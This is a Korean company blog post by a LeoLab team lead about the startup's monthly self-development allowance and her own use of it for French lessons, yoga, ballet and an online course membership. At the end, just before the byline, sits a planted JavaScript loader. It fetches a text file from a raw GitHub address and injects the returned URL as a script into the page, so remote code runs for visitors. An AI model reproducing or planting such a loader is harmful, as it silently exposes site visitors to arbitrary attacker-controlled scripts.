fbpx
리오랩

서울특별시 강남구 테헤란로 78길 14-10,
1층 리오랩

0507)1361-1554
hello@leolap.com
Back

스타트업에서는 자기계발비를 어떻게 사용할까?

안녕하세요. SG(Service Generating)팀을 이끌고 있는 김지수 (JANE)입니다. 오늘은 리오랩의 다양한 복지 중 멤버들이 활발하게 사용하고 있는
‘자기계발비’에 대해 작성해 보려고 합니다.

리오랩의 복지를 소개합니다! (자랑ㅎ)

리오랩에는 여러 복지가 있어요(가장 강력한 복지는 주4일제지만…). 그 중 멤버들이 가장 반응이 좋고 알차게 사용하고 있는 복지 3가지가 있습니다!
월마다 멤버당 원하는 간식과 도서를 구매할 수 있는 지원비, 자신의 개성과
전문성을 담은 프로필 사진 촬영 지원, 마지막으로 오늘 소개할 멤버의 성장과 발전을 위해 월 10만원씩 지원해 주는 자기계발비가 있습니다.

리오랩의 간식창고🍫 신청, 독서관 📚

리오랩의 자기계발비?

많은 회사들이 자기계발비를 통해 직원들에게 복지를 제공하는 것으로 알려져 있습니다. 그러나 시간 부족이나 사용처에 대한 제약으로 인해 사용하지 못하는 회사들도 많다고 알려져 있습니다. 하지만 저희의 자기계발비는 ‘회사에 어떤 방식으로든 기여 가능한 범위 내에서 사용 가능’한 조건만 지키면 됩니다! 조건이 조금 모호한 면이 있습니다만, 비윤리적인 용도를 제외하고는 거의 모든 사용이 허용된다는 의미입니다. 이는 리오(리오랩의 수장)이 멤버들이 다양한 분야의 경험을 통해 멋진 GENERALIST로 성장하길 바라는 마음에서 나온 것입니다! 다만, 자유도가 높은 대가로 지각 시에는 패널티로 10만원이 차감됩니다.

그래도 지각하지 않고 매월 적립하면 120만원의 지원금을 사용할 수 있어요! (제 인생에 지각은 없을 겁니다. 😎)

거의 모든 멤버들이 회사에 기여하는 방향으로 여러 가지 활동을 자기계발비를 통해 사용하고 있습니다. 체력 증진을 위한 헬스나 필라테스, 업무의 환기와 집중력 향상을 위한 활동(타투 수업 수강, 문화 클래스) 그리고 담당 분야의 전문성을 높이기 위한 강의 등으로요!

21년도 말부터 실행해서 21년도에 입사한 멤버들의 금액은 22년도에 이월되었습니다!

JANE의 사용 내역!🧾

이제 제가 작년에 얼마나 자기계발비를 알차게 사용했는 지 소개할게요!

첫번째는 프랑스 올림픽에 가겠다고 호기롭게 불어 강의를 신청했습니다. 일주일에 2번 하루에 3시간씩 7시부터 10시까지! 초반에는 대략적으로 알고 있는 인사말과 숫자를 배우고 간단한 회화를 배웠기 때문에 만만하게 생각했어요. 숙제도 많지 않았고요.

좌측 : [출처] 알리앙스 프랑세즈 강의 자료 / 우측 : [출처] 유튜브_ Extra French episode 1 with french subtitles
과외 식에 가까운 수업이었기 때문에 발음 교정하기 좋았고 궁금한 점을 바로 바로 물어볼 수 있어서 좋았어요.

그런데 점점 뒤로 갈 수록 어려워지는 문법과 많아지는 숙제로 점점 흥미를 잃었습니다…ㅎ 3시간동안 집중하기란 쉽지 않았어요. 하하 그래도 2개월동안 꾸준히 수업을 들었고 저는 불어로 제 소개정도는 할 수 있습니다! 😅 시간적인 여유가 아주 아~~~~주 많을 때 다시 배울 생각이에요!

[출처] 핀터레스트 jjalbang.today

Bonjour.
Je m’appelle 지수. Je suis employée. Je parle coreen.

두번째는 저에게 온전히 집중할 수 있는 시간을 갖는 요가와 발레에 사용했어요. 요가는 제가 전 직장을 다니면서 마음의 수양과 쉼을 찾기 위해 시작해서 지금까지 꾸준히 하고 있는 운동이고 발레도 활동적인 걸 하면서 스트레스를 풀기 위해 작년에 처음으로 시작했어요.

이 두가지를 같이 한 기간에는 주 5일동안 운동만 했어요. (ㅋㅋ 열심히 살았습니다.)

6시 새벽 요가하고 출근했어요!

이렇게 요가와 발레를 하니깐 당시에 살이 -4kg나 엄청 빠졌답니다. 👏👏 체지방은 줄고 근육량은 올랐습니다! 다이어트 성공! (지금은 다시 돌아왔지만 전 행복해요.ㅎ)

그리고 마지막 세번째 클래스101 연간 멤버십에 가입했습니다! 지금 PM(Project Manager)관련 강의도 듣고 디자인 시스템관련 강의도 듣고 있어요. 그때 그때 필요한 지식을 빠르게 얻기 위해 사용했습니다!

계속해서 성장해 나가는 나날이었다! 🏃‍♂️

이렇게 보니 작년에는 자기계발비로 그동안 망설였던 것들을 도전하고 열심히 살았던 거 같아요. 저보다 더 의미있는 곳에 사용한 리오랩 멤버들 모두 이렇게 살았을 거라고 생각해요~! 눈치 보지 않고 사용할 수 있는 자기계발비로 업무 외적인 활동을 하면서 스트레스도 풀고 저만의 휴식을 찾을 수있어서 기뻤습니다.

이번년도에도 활발히 자기계발비를 사용하고 있는 데요. 다들 어떻게 사용하고 있을 지 궁금하고 계속 성장해 나가는 멤버들이 너무 멋있습니다!! 리오랩 멤버들 화이팅~!

다음 아티클에서는 ‘팀 생산성 강화’ 목적의 실험비로 사용할 수 있는 운영지원금을 SG팀에서 어떻게 사용했는 지 소개하겠습니다! 많은 기대해주세요~!!

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
Jane
Jane